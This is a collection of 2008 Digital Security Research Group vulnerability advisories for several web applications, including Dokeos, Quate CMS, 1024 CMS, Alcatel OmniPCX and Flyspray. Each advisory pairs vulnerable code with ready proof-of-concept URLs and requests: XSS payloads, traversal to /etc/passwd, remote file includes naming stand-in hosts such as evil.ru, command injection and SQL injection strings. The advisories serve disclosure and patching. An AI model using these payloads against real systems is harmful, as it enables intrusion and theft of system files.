Digital Security Research Group [DSecRG] Advisory #DSECRG-08-032 Application:Claroline eLearning and eWorking platform Versions Affected: 1.8.10 Vendor URL: http://www.claroline.net/ Bug:Multiple Linked XSS Exploits: YES Reported: 18.07.2008 Vendor Response:22.07.2008 Solution: YES Date of Public Advisory:22.07.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Claroline system has multiple linked XSS vulnerabilities. Details *** 1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL string 1.1 Linked XSS vulnerabilities found in scripts: claroline/announcements/messages.php claroline/auth/lostPassword.php claroline/auth/profile.php claroline/calendar/myagenda.php claroline/group/group.php claroline/learnPath/learningPath.php claroline/learnPath/learningPathList.php claroline/learnPath/module.php claroline/phpbb/index.php claroline/tracking/courseLog.php claroline/tracking/course_access_details.php claroline/tracking/delete_course_stats.php claroline/tracking/userLog.php claroline/tracking/user_access_details.php claroline/user/user.php claroline/user/userInfo.php Attacker can inject XSS in URL string. Example: http://[server]/[installdir]/claroline/calendar/myagenda.php?;scriptalert('DSecRG XSS')/script http://[server]/[installdir]/claroline/user/user.php?;scriptalert('DSecRG XSS')/script 1.2 Linked XSS vulnerability found in claroline/tracking/courseLog.php GET parameter view Example: http://[server]/[installdir]/claroline/tracking/courseLog.php?view=DSec; STYLE=xss:expression(alert('DSecRG XSS')) 1.3 Linked XSS vulnerability found in claroline/tracking/toolaccess_details.php GET parameter toolId Example: http://[server]/[installdir]/claroline/tracking/toolaccess_details.php?toolId=;scriptalert('DSecRG XSS')/script Solution Vendor fix this flaw on 22.07.2008. New version 1.8.11 can be downloaded here: http://downloads.sourceforge.net/claroline/claroline1811.tar.gz http://downloads.sourceforge.net/claroline/claroline1811.zip About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-029] Local File Include in Dokeos E-Learning System 1.8.5
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-029 Application:Dokeos E-Learning System Versions Affected: 1.8.5 Vendor URL: http://dokeos.com/ Bug:Local File Include Exploits: YES Reported: 01.07.2008 Vendor response:05.07.2008 Solution: YES Date of Public Advisory:17.07.2008 Authors:Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Dokeos E-Learning System system has local file include vulnerability in script user_portal.php Vulnerable GET parameter include. Registered user can use this vulnerability. Code # if (!empty ($_GET['include']) !strstr($_GET['include'], '/') strstr($_GET['include'], '.html')) { include ('./home/'.$_GET['include']); $pageIncluded = true; } else .. # Example: http://[server]/[installdir]/user_portal.php?include=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00.html Fix Information *** you can fix it following this official information http://www.dokeos.com/wiki/index.php/Security Or wait a new release Fixing this issue can be done by replacing line 770 of /user_portal.php by: if (!empty ($_GET['include']) preg_match('/^[a-zA-Z0-9_-]*\.html$/',$_GET['include'])) About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) Regards, Digital Security Research Group [DSecRG] DIGITAL SECURITY tel/fax: +7(812)703-1547 tel: +7(812)430-9130 e-mail: [EMAIL PROTECTED] web: www.dsec.ru This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed.
[DSECRG-08-027] Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-027 Application:1024 CMS Versions Affected: 1.4.3, 1.4.4 RFC Vendor URL: http://www.1024cms.com/ Bug:Multiple Remote/Local File Include Exploits: YES Reported: 18.06.2008 Second report: 27.06.2008 Vendor Response:NONE Solution: NONE Date of Public Advisory:04.07.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** 1024 CMS has Remote File Include vulnerability and multiple Local File Include vulnerabilities. 1. Remote/Local File Include vulnerabilities found in scripts: themes/blog/layouts/standard.php themes/default/layouts/standard.php themes/portfolio/layouts/standard.php themes/snazzy/layouts/standard.php Code # ?php include(./themes/.$theme_dir./layouts/basic_header.php); ? div class=centerbigtable ?php if(!isset($page_include)) { if($page_ck['custom'] == '0') include(./pages/.$page./default/content.php); else include(./pages/custom/.$page./default/content.php); } else include($page_include); ? # Example: http://[server]/[installdir]/themes/blog/layouts/standard.php?page_include=http://evil.ru/evil.php http://[server]/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 http://[server]/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00 Multiple Local File Include vulnerabilities: 2. Local File Include vulnerability found in script admin/lang/fr/reports/default.php Code # if(isset($_GET['t'])) { switch($_GET['t']) { case forum: include(../admin/lang/.$lang./reports/ops/forum.php); break; case download: include(../admin/lang/.$lang./reports/ops/download.php); break; case news: include(../admin/lang/.$lang./reports/ops/news.php); break; } } else die(You cannot access this page directly); # Example: http://[server]/[installdir]/admin/lang/fr/reports/default.php?t=newslang=../../../../../../../../../../../../../boot.ini%00 3. Local File Include vulnerabilities found in scripts: admin/ops/admins/default.php admin/ops/reports/ops/download.php admin/ops/reports/ops/forum.php admin/ops/reports/ops/news.php Code # ?php include(./themes/.$admin_theme_dir./templates/default_header.tpl); ... # Example: http://[server]/[installdir]/admin/ops/admins/default.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00 http://[server]/[installdir]/admin/ops/reports/ops/news.php?admin_theme_dir=../../../../../../../../../../../../../boot.ini%00 4. Local File Include vulnerabilities found in scripts: lang/en/moderator/default.php lang/fr/moderator/default.php Code # if(isset($_GET['t'])) { switch($_GET['t']) { case forum: include(./lang/.$lang./moderator/ops/forum.php); break; case download: include(./lang/.$lang./moderator/ops/download.php); break; case gallery: include(./lang/.$lang./moderator/ops/gallery.php); break; case news: include(./lang/.$lang./moderator/ops/news.php); break; } } # Example: http://[server]/[installdir]/lang/en/moderator/default.php?t=newslang=../../../../../../../../../../../../../boot.ini%00 http://[server]/[installdir]/lang/fr/moderator/default.php?t=downloadlang=../../../../../../../../../../../../../boot.ini%00 5. Local File Include vulnerability found in script lang/de/moderator/default.php Code # if(isset($_GET['t'])) { switch($_GET['t']) { case forum: include(./lang/.$lang./moderator/ops/forum.php); break; case download: include(./lang/.$lang./moderator/ops/download.php); break; case news: include(./lang/.$lang./moderator/ops/news.php); break
[DSECRG-08-024] Multiple Security Vulnerabilities (RFI,LFI,XSS) in QuateCMS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-024 Application:Quate CMS Versions Affected: 0.3.4 Vendor URL: http://www.quate.net/ Bugs: RFI, Multiple LFI, Directory traversal, Multiple XSS Exploits: YES Reported: 18.03.2008 Second report: 25.03.2008 Vendor response:NONE Solution: NONE Date of Public Advisory:23.05.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Quate CMS system has multiple security vulnerabilities: 1. Multiple Remote/Local File Include 2. Multiple Linked XSS vulnerabilities 3. Directory traversal Details *** 1. Quate CMS has Multiple Local File Include vulnerabilities. 1.1 Local File Include vulnerability found in script admin/includes/footer.php Code # if ($not_logged_in != 1) { if (file_exists(includes/themes/ .$row_secure['account_theme']. /footer.php)) { require_once(themes/ .$row_secure['account_theme']. /footer.php); } else { require_once(themes/ .$admin_template_default. /footer.php); } } else { require_once(themes/ .$admin_template_default. /footer.php); } # Example: http://[server]/[installdir]/admin/includes/footer.php?admin_template_default=../../../../../../../../../../../../../etc/passwd%00 http://[server]/[installdir]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00 http://[server]/[installdir]/admin/includes/footer.php?not_logged_in=1admin_template_default=../../../../../../../../../../../../../etc/passwd%00 1.2 Remote and Local File Include vulnerability found in script admin/includes/header.php Code # if ($bypass_installed != 1) { if (!is_file(../includes/installed)) { ... require(../includes/simple_gui.php); exit(); } } if ($bypass_restrict != 1) { require_once($secure_page_path. includes/secure.php); } $admin_template_default = default; if ($not_logged_in != 1) { //echo $row_secure['account_theme']; if (file_exists(includes/themes/ .$row_secure['account_theme']. /header.php)) { require_once(themes/ .$row_secure['account_theme']. /header.php); } else { require_once(themes/ .$admin_template_default. /header.php); } } else { require_once(themes/ .$admin_template_default. /header.php); } # Example: http://[server]/[installdir]/admin/includes/header.php?bypass_installed=1secure_page_path=http://evilhost/info.php%00 http://[server]/[installdir]/admin/includes/header.php?bypass_installed=1bypass_restrict=1row_secure[account_theme]=../../../../../../../../../../../../../etc/passwd%00 - 2. Linked XSS in Path vulnerability found in following pages: /admin/index.php /admin/login.php /admin/credits.php /upgrade/index.php Example: http://[server]/[installdir]/admin/login.php/;scriptalert(DSecRG XSS)/script http://[server]/[installdir]/upgrade/index.php/;IMG SRC=javascript:alert('DSecRG XSS') - 3. File Manager directory traversal Administrator can access system files outside htdocs directory using directory traversal vulnerability. http://[server]/[installdir]/admin/filemanager.php?type=editdir=/../../../../../../../../..file=boot.ini About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-025] Local File Include in OneCMS 2.5
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-025 Application:OneCMS Versions Affected: 2.5 Vendor URL: http://www.insanevisions.com/ Bug:Local File Include Exploits: YES Reported: 26.03.2008 Vendor Response:NONE Solution: NONE Date of Public Advisory:23.05.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Local File Include vulnerability found in script install_mod.php Code # $mod = $_GET['load']; $filexp = explode(., $mod); $filetype = $filexp[1]; $file = $filexp[0]; $file2 = mods/$mod; if (!is_numeric($mod)) { // makes sure that the user isnt entering a # if ($filetype == php) { if ($_GET['act'] == ) { echo Are you sure you would like to install the b.$file./b module?bra href='install_mod.php?load=.$mod.act=go'Yes/a; } if ($_GET['act'] == go) { include ($file2); ... # Example: http://[server]/[installdir]/install_mod.php?act=goload=1234.php../../../../../../../../../../../../../etc/passwd About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-023] SAP Web Application Server XSS Security Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-023 Application:SAP Web Application Server Versions Affected: Version 7.0 Vendor URL: http://SAP.com Bugs: XSS Exploits: YES Reported: 25.01.2008 Vendor response:25.01.2008 Date of Public Advisory:21.05.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** SAP Web Application Server system has Linked XSS security vulnerability Details *** Linked XSS vulnerability found in URL /sap/bc/gui/sap/its/webgui/ attacker can inject XSS in URL string also Web Dynpro ABAP and for BSP are vulnerable. Example: http://[server]:8000/sap/bc/gui/sap/its/webgui/aaa;img/src=javascript:alert('DSECRG_XSS') - Fix Information *** The issue has been solved in the ICF system login and as such it is not only relevant for the Web GUI, but also for Web Dynpro ABAP and for BSP Customers can download patches following the solution is documented in SAP note 1136770 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru
[DSECRG-08-020] Alcatel OmniPCX Office Remote Comand Execution
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-020 Application:Alcatel OmniPCX Office Versions Affected: Alcatel OmniPCX Office since release 210/061.1 Vendor URL: http://alcatel.com Bugs: Remote command execution Exploits: YES Risk: High CVSS Score: 7.31 CVE-number: 2008-1331 Reported: 31.01.2008 Vendor response:01.02.2008 Customers informed: 07.03.2008 Published on PSIRT: 01.04.2008 Date of Public Advisory:21.05.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Introduction The OmniPCX Enterprise is an integrated communications solution for medium-sized businesses and large corporations. It combines the best of the old (legacy TDM phone connectivity) with the new (a native IP platform and support for Session Initiation Protocol, or SIP) to provide an effective and complete communications solution for cost-conscious companies on the cutting edge. (from the vendor's homepage) Description *** Alcatel OmniPCX Office Web Interface has critical security vulnerability Remote command execution The risk of this vulnerability is high. Any user which has access to the web interface of the OmniPCX Enterprise solution will be able to execute arbitrary commands on the server with the permissions of the webserver. Details *** Remote command execution vulnerability found in script /cgi-data/FastJSData.cgi in parameter name id2 Variable id2 not being filtered when passed to the shell. Thus, arbitrary commands can be executed on the server by adding them to the user variable, separated by semicolons. You can find more details on this advisory on vendors website http://www1.alcatel-lucent.com/psirt/statements.htm under reference 2008001 Example: http://[server]/cgi-data/FastJSData.cgi?id1=sh2kerrid2=91|cat%20/etc/passwd Fix Information *** Alcatel was altered to fix this flaw on 01.04.2008. Updated version can be downloaded here: http://www1.alcatel-lucent.com/enterprise/en/products/ip_telephony/omnipcxenterprise/index.html About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-022] Multiple Security Vulnerabilities in Bolinos 4.6.1
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-022 Application:BolinOS Versions Affected: 4.6.1 Vendor URL: http://www.bolinos.com Bugs: Local File Include,Multiple XSS, System information disclosure Exploits: YES Reported: 13.03.2008 Second report: 18.03.2008 Vendor response:none Solution: none Date of Public Advisory:25.03.2008 Authors:Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** BolinOS system has multiple security vulnerabilities: 1. Local File Include 2. Multiple Linked XSS vulnerabilities 3. Multiple XSS in POST 4. System information disclosure Details *** 1. Local File Include vulnerability found in system/_b/contentFiles/gbincluder.php Code # $actionpagetoinclude=$_GET[_bFileToInclude]; if($actionpagetoinclude!= @file_exists(gBRootPath./$actionpagetoinclude)){ @include(gBRootPath./$actionpagetoinclude); } else{ echo NO FILE; } # Example: http://[server]/[installdir]/system/_b/contentFiles/gbincluder.php?_bFileToInclude=../../../../../../../../../../../../../etc/passwd - 2. Multiple linked XSS vulnerabilities found. 2.1 Linked XSS vulnerability found in page /system/actionspages/_b/contentFiles/gBImageViewer.php Attacker can inject XSS in GET parameter url Example: http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBImageViewer.php?url=scriptalert('DSecRG XSS')/script 2.2 Linked XSS vulnerability found in page /system/actionspages/_b/contentFiles/gBselectorContents.php Attacker can inject XSS in GET parameter ForEditor. Example: http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBselectorContents.php?ForEditor='IMG%20SRC=javascript:alert('DSecRG XSS') 2.3 Linked XSS vulnerabilities found in following pages: /system/actionspages/_b/contentFiles/gBLoginPage.php /system/actionspages/_b/contentFiles/gBPassword.php Attacker can inject XSS script in URL Example: http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBLoginPage.php/;scriptalert('DSecRG XSS')/script http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBPassword.php/;scriptalert('DSecRG XSS')/script - 3. Multiple XSS in POST vulnerabilities, attacker can inject XSS in POST parameter. 3.1 Vulnerability found in script /system/actionspages/_b/contentFiles/gBLoginPage.php POST parameter formlogin. Example: POST /bolinos/system/actionspages/_b/contentFiles/gBLoginPage.php?bAddress=bolinos.sessions HTTP/1.0 Content-Length: 81 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DS; .NET CLR 2.0.50727) formlogin=%27img%20src%3d%22javascript:alert(%27DSecRG%20XSS%27)%22BtLogin.x= 3.2 Vulnerability found in page /help/index.php POST parameter bolini_searchengine46Search. Example: bolini_searchengine46Search = 'IMG SRC=javascript:alert(quot;DSecRG#x20;XSSquot;) 4. System information disclosure Non-authentication user can access phpinfo() page. http://[server]/[installdir]/system/actionspages/_b/contentFiles/gBphpInfo.php About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-019] LFI in PowerBook 1.21
Hello, bugtraq. [DSECRG-08-031] Digital Security Research Group [DSecRG] Advisory Application:PowerBook Versions Affected: 1.21 Vendor URL: http://www.powerscripts.org/ Bug:Local File Include Exploits: YES Reported: 01.02.2008 Vendor Response:none Solution: none Date of Public Advisory:..2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Local File Include vulnerability found in script pb_inc/admincenter/index.php Non-authentication user can directly access to this script. To exploit this vulnerability REGISTER_GLOBALS option must be ON in php config file. Code # if (!$page) { $page = home; } $page .= .inc.php; if(file_exists($page) == false) { echo div align=\center\Sorry, the page b$page/b does not exist!/div ; } else { include($page); } # Example: http://[server]/[installdir]/pb_inc/admincenter/index.php?page=../../../../../../../../../../../../../etc/passwd%00 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Alexandr Polyakov DIGITAL SECURITY RESEARCH GROUP mailto:[EMAIL PROTECTED]
[DSECRG-08-017] Flyspray 0.9.9.4 Multiple Security Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-017 Application:Flyspray (web-based bug tracking system) Versions Affected: 0.9.9.4 Vendor URL: http://www.flyspray.org Bugs: SiXSS, Stored XSS, Brute Force Exploits: YES Reported: 08.02.2008 Vendor response:08.02.2008 Solution: 24.02.2008 Date of Public Advisory:03.03.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Flyspray system has multiple security vulnerabilities: 1. SiXSS in POST 2. Stored XSS in POST 3. Login Error Messages Credential Enumeration Details *** 1. SiXSS in POST, attacker can inject XSS code in SQL Error. 1.1 Vulnerabilities found in script index.php?do=myprofile. POST parameters tasks_perpage, time_zone, account_enabled, notify_own. Example: tasks_perpage = scriptalert('DSecRG XSS')/script time_zone = img src=javascript:alert('DSecRG XSS') 1.2 Vulnerabilities found in script index.php?do=adminarea=newproject. POST parameters anon_open, others_view. Example: anon_open = img src=javascript:alert('DSecRG XSS') 1.3 Vulnerabilities found in script index.php?do=adminarea=cat. POST parameters lft[4], rgt[4]. Example: rgt[4] = scriptalert('DSecRG XSS')/script 1.4 Vulnerabilities found in script index.php?do=pmarea=prefs. POST parameters comment_closed, project_is_active. Example: project_is_active = img src=javascript:alert('DSecRG XSS') 1.5 Vulnerabilities found in script index.php?do=details. POST parameters closedby_version, edit, edit_start_time, find_user, item_status, operating_system, percent_complete, product_category, project_id, reportedver, task_priority, task_severity, task_type, . Example: project_id = scriptalert('DSecRG XSS')/script item_status = img src=javascript:alert('DSecRG XSS') - 2. Vulnerability found in script index.php?do=details in task details page. POST parameter item_summary. Example: item_summary = scriptalert('DSecRG XSS')/script - 3. Login Error Messages Credential Enumeration When trying to login using bad credentials, the application generates different error messages when the user inputs an invalid username and an invalid password separately. Attacker ca use the brute force technique to establish valid usernames, before proceeding to attempt discovery of the associated password. Fix Information *** Flyspray was altered to fix this flaw on 24.02.2008. Updated version (0.9.9.5) can be downloaded here: http://www.flyspray.org/download/ Vendor advisory *** http://flyspray.org/fsa:3 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-016] Jinzora 2.7.5 Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-016 Application:Jinzora Media Jukebox Versions Affected: 2.7.5 Vendor URL: http://www.jinzora.com/ Bugs: Multiple XSS Injections Exploits: YES Reported: 04.02.2008 Second report: 12.02.2008 Vendor response:NONE Date of Public Advisory:19.02.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Jinzora system has multiple security vulnerabilities: 1. Linked XSS 2. Stored XSS Details *** 1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL string. 1.1 Linked XSS vulnerabiliies found in index.php. GET parameters frontend, set_frontend, jz_path, theme, set_theme. Example: http://[server]/[installdir]/index.php?frontend=IMG SRC=javascript:alert('DSecRG XSS') 1.2 Linked XSS vulnerabilities found in ajax_request.php. GET parameters frontend, theme, language. Example: http://[server]/[installdir]/ajax_request.php?language=IMG SRC=javascript:alert('DSecRG XSS') 1.3 Linked XSS vulnerability found in slim.php. GET parameter jz_path. Example: http://[server]/[installdir]/slim.php?jz_path=IMG SRC=javascript:alert('DSecRG XSS') 1.4 Linked XSS vulnerabilities found in popup.php. GET parameters frontend, theme, jz_path. Example: http://[server]/[installdir]/popup.php?theme=IMG SRC=javascript:alert('DSecRG XSS') 1.5 Linked XSS in Path vulnerability found in index.php and slim.php. Example: http://[server]/[installdir]/index.php/;scriptalert('DSecRG XSS')/script - 2. Stored XSS 2.1 Vulnerability found in script popup.php?ptype=sitenews in post parameter name siteNewsData Example: siteNewsData = /textareascriptalert('DSecRG XSS')/script 2.1 Vulnerability found in script popup.php?ptype=playlistedit in post parameter name query Example: query = scriptalert('DSecRG XSS')/script About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -- Digital Security Research Group mailto:[EMAIL PROTECTED]
[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-015 Application:Dokeos E-Learning System Versions Affected: 1.8.4 Vendor URL: http://dokeos.com Bugs: Multiple SQL Injections,Multiple Blind SQL Injections,Multiple XSS, etc. Exploits: YES Reported: 25.01.2008 Vendor response:28.01.2008 Patch released: 12.02.2008 Date of Public Advisory:19.02.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Dokeos E-Learning System system has multiple security vulnerabilities: 1. Multiple SQL Injections 2. Multiple Blind Sql Injections 3. Multiple Stored XSS 4. Multiple Linked XSS 5. Image XSS Details *** 1. Multiple SQL Injections 1.1 Attacker can inject SQL code in module /whoisonline.php vulnerable parametr id Attacker must have valid user creditionals Example: http://[server]/[installdir]/whoisonline.php?id=1'+and+dsec=dsecrg+union+select+user(),version()/* 1.2 Attacker can inject SQL code in module main/mySpace/index.php vulnerable parameter tracking_list_coaches_column Example: http://[server]/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASCtracking_list_coaches_page_nr=1tracking_list_coaches_per_page=20view=admin tracking_list_coaches_column=0'; 1.3 Attacker can inject SQL code in module /dokeos/main/create_course/add_course.php POST Parameter tutor_name Example: POST /dokeos/main/create_course/add_course.php HTTP/1.0 Cookie: dk_sid=av68g9lus300ts870iqebhneh5 Content-Length: 107 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: localhost Content-Type: application/x-www-form-urlencoded Referer: http://localhost/dokeos/main/create_course/add_course.php title=1234category_code=PROJwanted_code=1234course_language=slovenian_qf__add_course= tutor_name=' - 2. Multiple SQL Injections 2.1 Vulnerability found in script index.php in header parameter Referer Example: GET /dokeos/index.php HTTP/1.0 Cookie: dk_sid=av68g9lus300ts870iqebhneh5 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: localhost Referer: ' 2.1 Vulnerability found in script /main/admin/class_list.php? in header parameter X-Fowarded-For - 3. Stored XSS vulnerability found in /main/auth/inscription.php attacker can inject XSS in POST parameter username - 4. Multiple linked XSS 4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php attacker can inject XSS in parameter courseCode Example: http://[server]/[installdir]/main/calendar/myagenda.php?courseCode=;scriptalert('DSecRG XSS')/script 4.2 Linked XSS vulnerability found in main/admin/course_category.php attacker can inject XSS in parameter category Example: http://[server]/[installdir]/dokeos/main/admin/course_category.php?category=scriptalert('DSecRG XSS')/script HTTP/1.0 4.3 Linked XSS vulnerability found in /dokeos/main/admin/session_list.php attacker can inject XSS in parameter cmessage Example: http://[server]/[installdir]/dokeos/main/admin/session_list.php?action=show_messagemessage=%22%27img/src=javascript:alert('DSecRG XSS') - 5. Image XSS vulnerability in page main/auth/profile.php attacker can upload avatar picture with XSS code: Example: More info: http://www.dsec.ru/about/articles/web_xss/ (in Russian) - Fix Information *** Vendor fix this flaw on 12.02.2008. Patch for version 1.8.4 can be downloaded here: http://www.dokeos.com/wiki/index.php/Security#Dokeos_1.8.4_SP2_download About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian) Digital Security Research Groupmailto:[EMAIL PROTECTED]
[DSECRG-08-011 | FIX INFORMATION] Astrosoft HelpDesk Multiple XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-011 | FIX INFORMATION Application:Astrosoft HelpDesk Versions Affected: 1.95.228 Vendor URL: http://astrosoft.ru/ Bugs: Multiple XSS Injections Exploits: YES Reported: 29.01.2008 Date of Public Advisory:04.02.2008 Vendor response:05.02.2008 Updated Report: 14.02.2008 Solution: HelpDesk was altered to fix this flaw on 13.02.2008. Updated version - 1.95.228 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-014] Multiple LFI in PowerNews (Newsscript) 2.5.6
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-014 Application:PowerNews (Newsscript) Versions Affected: 2.5.6 Vendor URL: http://www.powerscripts.org/ Bug:Multiple Local File Include Exploits: YES Reported: 01.02.2008 Vendor Response:none Solution: none Date of Public Advisory:08.02.2008 Authors:Alexandr Polyakov, Stas Svistunovich Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** PowerNews (Newsscript) has Multiple Local File Include vulnerabilities. 1. Local File Include vulnerabilities found in scripts: pnadmin/categories.inc.php pnadmin/news.inc.php pnadmin/other.inc.php pnadmin/permissions.inc.php pnadmin/templates.inc.php pnadmin/users.inc.php Non-authentication user can directly access to this scripts. Code # if ($_GET[subpage]) { if (file_exists($_GET[page]._.$_GET[subpage]..inc.php)) { include($_GET[page]._.$_GET[subpage]..inc.php); } else { ?center?PHP echo L_ALL_SUBPAGENOTFOUND; ?/center?PHP } } else { # Example: http://[server]/[installdir]/pnadmin/categories.inc.php?subpage=../../../../../../../../../../../../../etc/passwd%00 2. Local File Include vulnerability found in script pnadmin/index.php in admin area. Administrator can include local files. Code # if ($pnloggedin != YES) { include(login.inc.php); } else { if (!$_GET[page]) { $_GET[page] = main; } if (file_exists($_GET[page]..inc.php)) { include($_GET[page]..inc.php); } else { # Example: http://[server]/[installdir]/pnadmin/index.php?page=../../../../../../../../../../../../../etc/passwd%00 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-013] Modx 0.9.6.1, 0.9.6.1p1 Multiple Security Vulnerabilities
